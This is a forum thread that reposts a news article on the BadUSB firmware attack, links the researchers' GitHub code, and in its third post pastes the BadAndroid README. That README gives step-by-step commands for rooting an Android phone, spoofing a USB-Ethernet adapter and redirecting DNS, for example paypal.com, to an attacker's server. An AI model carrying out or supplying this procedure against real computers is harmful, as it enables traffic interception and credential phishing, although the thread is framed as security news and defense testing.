Hello Guest, if you are reading this it means you have not registered yet. Please take a second, Click here to register, and in a few simple steps you will be able to enjoy our community and use our OpenViX support section.
Results 1 to 3 of 3

Thread: BadUSB the unpatchable malware code published on Github

  1. #1
    Larry-G's Avatar
    Title
    V.I.P
    Donated Member
    Join Date
    May 2010
    Posts
    32,542
    Thanks
    7,824
    Thanked 22,934 Times in 12,378 Posts

    BadUSB the unpatchable malware code published on Github

    BadUSB : The unpatchable and unfixable USB malware

    Exactly two months after researcher Karsten Nohl demonstrated an attack he called BadUSB to a standing-room-only crowd at the Black Hat security conference in Las Vegas. The BadUSB was later demonstrated again by two researchers, Adam Caudill and Brandon Wilson. Caudill and Wilson presented the vulnerability at Derbycon 4.0 conference last week in Louisville.


    What is BadUSB?

    The malware which is dubbed BadUSB, reprograms embedded firmware to give USB devices new, covert and most powerful capabilities. In a demo at Black Hat security conference in Las Vegas, a USB drive was infected and showed its ability to act as a keyboard that surreptitiously types malicious commands into attached computers.
    Another USB was similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The demo showed that similar hacks could work against Android phones when attached to targeted computers. The malware is so huge that it can work on almost any USB linked devices like Web cams, keyboards, smart phones etc.


    BadUSB on Github

    Researchers Wilson and Caudill reversed-engineered USB firmware and reprogrammed it to launch various attacks. They then put the code for BadUSB on Github with a intent of letting all the users know abouts its effects.
    “The belief we have is that all of this should be public. It shouldn’t be held back. So we’re releasing everything we’ve got,” Caudill told the Derbycon audience on Friday. “This was largely inspired by the fact that [SR Labs] didn’t release their material. If you’re going to prove that there’s a flaw, you need to release the material so people can defend against it.”
    Caudill and Wilson discussed various scenarios where BadUSB can be used. Prominent among them and most deadliest is the USB device to emulate a keyboard and issue commands on behalf of a logged-in user to exfiltrate data or install malware.


    Unpatchable!!!

    BadUSB remains unpatchable at the moment. The reason according to the both the researchers, is that the USB controller chips in peripherals can be reprogrammed to spoof other devices and there’s little or no protection to prevent anyone from doing so. They also feel that since USBs are mass manufactured these days and it proves that anyone can input the code to insert the malware and take command of any system, perhaps the USB manufacturers will be under pressure to fix it soon.
    “If the only people who can do this are those with significant budgets, the manufacturers will never do anything about it,” Caudill told Wired. “You have to prove to the world that it’s practical, that anyone can do it…That puts pressure on the manufactures to fix the real issue.”
    The researchers also hope that putting the code on Github would encourage companies and white hat researchers to find a fix for the malware.

    Code:
    http://www.techworm.net/2014/10/badusb-malware-code-on-github.html






    My posts contain my own personal thoughts and opinions, they do not represent those of any organisation or group but my own.

    If you don't like what I post, Don't read it.

    SIMPLES.

  2. The Following User Says Thank You to Larry-G For This Useful Post:

    seame (07-10-14)

  3. #2
    Larry-G's Avatar
    Title
    V.I.P
    Donated Member
    Join Date
    May 2010
    Posts
    32,542
    Thanks
    7,824
    Thanked 22,934 Times in 12,378 Posts
    For those curious enough to go looking for this on GITHUB, here you go.

    Code:
    https://github.com/adamcaudill/Psychson
    My posts contain my own personal thoughts and opinions, they do not represent those of any organisation or group but my own.

    If you don't like what I post, Don't read it.

    SIMPLES.

  4. The Following User Says Thank You to Larry-G For This Useful Post:

    seame (07-10-14)

  5. #3
    Larry-G's Avatar
    Title
    V.I.P
    Donated Member
    Join Date
    May 2010
    Posts
    32,542
    Thanks
    7,824
    Thanked 22,934 Times in 12,378 Posts
    proof-of-concept for Android devices that you can use to test your defenses: BadAndroid-v0.1.


    #############################
    ## BadAndroid v0.1 ##
    ## Android USB-Ethernet ##
    ## Emulation and DNS MitM ##
    #############################
    ## Jakob Lell ##
    ## <jakob@srlabs.de> ##
    #############################


    Purpose: Spoof a USB-Ethernet adapter from an Android phone to capture network traffic from a connected computer. Then change some DNS answers to redirect traffic.


    #1. Root your phone, make sure its connected to the Internet


    #2. Install busybox (e.g., using the stericson busybox installer)


    #3. Create a hosts file with the domains you want to redirect and with your server’s IP; such as:
    1.2.3.4 paypal.com www.paypal.com


    #4. Copy the scripts and hosts file to the phone:
    adb push bad.sh /data/local/tmp/
    adb push cleanup.sh /data/local/tmp/
    adb push hosts /data/local/tmp/


    #5. Install and open a terminal on the phone (e.g. jackpal/Android-Terminal-Emulator) and get a root shell: /system/xbin/su


    #6. Run bad.sh: sh /data/local/tmp/bad.sh


    #7. Attach the phone to the Windows or Linux computer you want to attack; web traffic should now go through the phone with partial redirection of those domains in the hosts file


    #8. When you are finished with the attack, either reboot your phone or run the cleanup.sh script to restore the standard Android USB functionality
    My posts contain my own personal thoughts and opinions, they do not represent those of any organisation or group but my own.

    If you don't like what I post, Don't read it.

    SIMPLES.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
This website uses cookies
We use cookies to store session information to facilitate remembering your login information, to allow you to save website preferences, to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners.